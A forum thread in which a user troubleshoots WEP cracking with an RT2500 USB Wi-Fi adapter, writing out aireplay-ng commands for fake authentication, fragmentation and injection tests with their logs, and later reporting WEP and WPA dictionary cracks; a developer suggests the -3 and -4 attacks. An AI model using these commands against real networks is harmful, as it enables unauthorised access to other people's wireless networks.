Thread: Hawking Wireless G and Aireplay

  1. #1
    Junior Member tek911's Avatar
    Join Date
    Jan 2010
    Posts
    59

    Hawking Wireless G and Aireplay

    Ok, so I'm new to the remote exploit forums so be gentle (I know the awe-inspiring power of a moderator scorned).

    Basically, I hopped on the USB wifi card bandwagon (I'm a recovering PCMCIA junkie). So I'm running through some issues I'm encountering with the new card. First the obligatory particulars:

    It's a Hawking wireless G USB wireless adapter.
    It's an RT2500 chipset adapter.
    I'm running BT3BETA (the current latest, I think released in Dec).

    So, WPA/WPA2 cracking is going ok (well, it's pretty much just a grab and bag anyway) but WEP cracking is spotty. And here's why I say that.

    First, as usual I place the card in monitor mode (it's rausb0).
    Then I perform the association and authentication step (aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI rausb0). Both successful.

    The problem starts when I go to perform the fragmentation attack. So, I run aireplay-ng -5 -b $AP -h $WIFI rausb0 and this is what I get after I select the packet to use:
    09:19:51 Data packet found!
    09:19:51 Sending fragmented packet
    09:19:53 No answer, repeating...
    <repeats a bit>
    09:20:39 Still nothing, trying another packet...

    This goes on for a bit, but never grabs the fragment xor file.

    Sometimes when I mess with antenna positioning I get:
    09:24:10 Data packet found!
    09:24:10 Sending fragmented packet
    09:24:12 No answer, repeating...
    09:24:12 Trying a LLC NULL packet
    09:24:12 Sending fragmented packet
    09:24:12 Got RELAYED packet!!
    09:24:12 Trying to get 384 bytes of a keystream
    09:24:14 No answer, repeating...

    (the "Got RELAYED packet!!" and keystream lines are different than before)
    Sometimes I get a third variation with a line saying not enough acks.

    The problem is I've seen on the same card for the fragment file to be created in like the first run-through of a packet grabbed. Another time the second. I'm trying to get a better understanding of if it's something I'm doing wrong or just signal, as I've had mixed results being able to crack an AP right next to me or one next door (don't worry, my girlfriend's sister lives next door to her and I got her permission, so don't hop on me, Trolls!)

    I got so curious I ran the inject test built into aircrack with the following syntax:
    aireplay-ng -9 -e $SSID -a $AP -i ath0 rausb0

    and got:

    09:30:33 Waiting for beacon frame (BSSID: 00:19:E4:73:53:B9) on channel 11
    09:30:33 Trying broadcast probe requests...
    09:30:33 Injection is working!
    09:30:35 Found 1 AP

    09:30:35 Trying directed probe requests...
    09:30:35 00:19:E4:73:53:B9 - channel: 11 - '2WIRE744'
    09:30:37 Ping (min/avg/max): 0.695ms/58.322ms/68.006ms Power: 24.20
    09:30:37 30/30: 100%


    09:30:37 Trying card-to-card injection...
    09:30:37 Attack -0: OK
    09:30:37 Attack -1 (open): OK
    09:30:38 Attack -1 (psk): OK
    09:30:39 Attack -2/-3/-4: OK
    09:30:43 Attack -5: Failed

    ath0 is an internal wifi in my laptop.

    Guess I wrote a book there but any help is appreciated in advance.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Have you tried the -4 attack or the -3 attack? Please let us know how you get on with those.

  3. #3
    Junior Member tek911's Avatar
    Join Date
    Jan 2010
    Posts
    59

    -4 worked with the card. Any idea why -5 isn't? MAC filtering, you think?

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Sometimes both attacks don't work. I imagine that's why there are two different ones.

  5. #5
    Junior Member tek911's Avatar
    Join Date
    Jan 2010
    Posts
    59

    Well hey, thanks for the help. WEP down, dictionary brute force of WPA/WPA2 down, airpwn (just fun) and now...time for learning about airolib and the aircrack-ng server pieces.
